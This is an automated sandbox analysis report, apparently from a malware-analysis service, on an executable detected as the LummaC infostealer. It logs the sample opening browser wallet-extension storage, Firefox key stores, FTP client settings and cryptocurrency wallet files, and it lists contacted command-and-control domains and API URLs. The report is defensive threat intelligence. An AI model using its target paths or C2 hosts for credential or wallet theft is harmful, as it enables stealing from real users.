                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.3121711204.0000000000B05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.3121039700.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.3121763569.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ardware-v1.exe PID: 1972, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ardware-v1.exe PID: 1972, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Deobfuscate/Decode Files or Information                		LSASS Memory11
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol41
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ardware-v1.exe15%VirustotalBrowse
                ardware-v1.exe24%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://ocsp.sectigo.com000%Avira URL Cloudsafe
                https://awake-weaves.cyou/apii100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apis70%Avira URL Cloudsafe
                https://deafeninggeh.biz/PK100%Avira URL Cloudmalware
                https://lev-tolstoi.com/api000%Avira URL Cloudsafe
                https://lev-tolstoi.com/0%Avira URL Cloudsafe
                https://lev-tolstoi.com/e0%Avira URL Cloudsafe
                https://community.fastJ0%Avira URL Cloudsafe
                https://wrathful-jammy.cyou/DI;100%Avira URL Cloudmalware
                https://lev-tolstoi.com/S$_0%Avira URL Cloudsafe
                https://lev-tolstoi.com/api0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apim0%Avira URL Cloudsafe
                spend-shiny.cyou100%Avira URL Cloudmalware
                https://sordid-snaked.cyou/s100%Avira URL Cloudmalware
                https://lev-tolstoi.com/uo0%Avira URL Cloudsafe
                https://lev-tolstoi.com/te0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		23.55.153.106
                		truefalse
                  		high
                  lev-tolstoi.com
                  		172.67.157.254
                  		truetrue
                    		unknown
                    immureprech.biz
                    		45.77.249.79
                    		truefalse
                      		high
                      deafeninggeh.biz
                      		104.131.68.180
                      		truefalse
                        		high
                        sordid-snaked.cyou
                        		unknown
                        		unknownfalse
                          		high
                          diffuculttan.xyz
                          		unknown
                          		unknownfalse
                            		high
                            effecterectz.xyz
                            		unknown
                            		unknownfalse
                              		high
                              spend-shiny.cyou
                              		unknown
                              		unknowntrue
                                		unknown
                                awake-weaves.cyou
                                		unknown
                                		unknownfalse
                                  		high
                                  wrathful-jammy.cyou
                                  		unknown
                                  		unknownfalse
                                    		high
                                    debonairnukk.xyz
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      sordid-snaked.cyoufalse
                                        		high
                                        deafeninggeh.bizfalse
                                          		high
                                          effecterectz.xyzfalse
                                            		high
                                            wrathful-jammy.cyoufalse
                                              		high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                		high
                                                awake-weaves.cyoufalse
                                                  		high
                                                  immureprech.bizfalse
                                                    		high
                                                    https://immureprech.biz/apifalse
                                                      		high
                                                      debonairnukk.xyzfalse
                                                        		high
                                                        https://lev-tolstoi.com/apitrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        spend-shiny.cyoutrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        diffuculttan.xyzfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://lev-tolstoi.com/apis7ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/chrome_newtabardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://player.vimeo.comardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://immureprech.biz/ardware-v1.exe, 00000000.00000003.2934962608.0000000000A60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0ardware-v1.exefalse
                                                                      		high
                                                                      https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://steamcommunity.com/?subsection=broadcastsardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#ardware-v1.exefalse
                                                                            		high
                                                                            http://ocsps.ssl.com0?ardware-v1.exefalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&aardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0ardware-v1.exefalse
                                                                                  		high
                                                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/publardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://store.steampowered.com/subscriber_agreement/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.gstatic.cn/recaptcha/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://deafeninggeh.biz/PKardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          http://www.valvesoftware.com/legal.htmardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.youtube.comardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.google.comardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://lev-tolstoi.com/api00ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://diffuculttan.xyz/apiardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://s.ytimg.com;ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxxardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://lev-tolstoi.com/eardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121711204.0000000000B05000.00000004.00000020.00020000.00000000.sdmpfalse
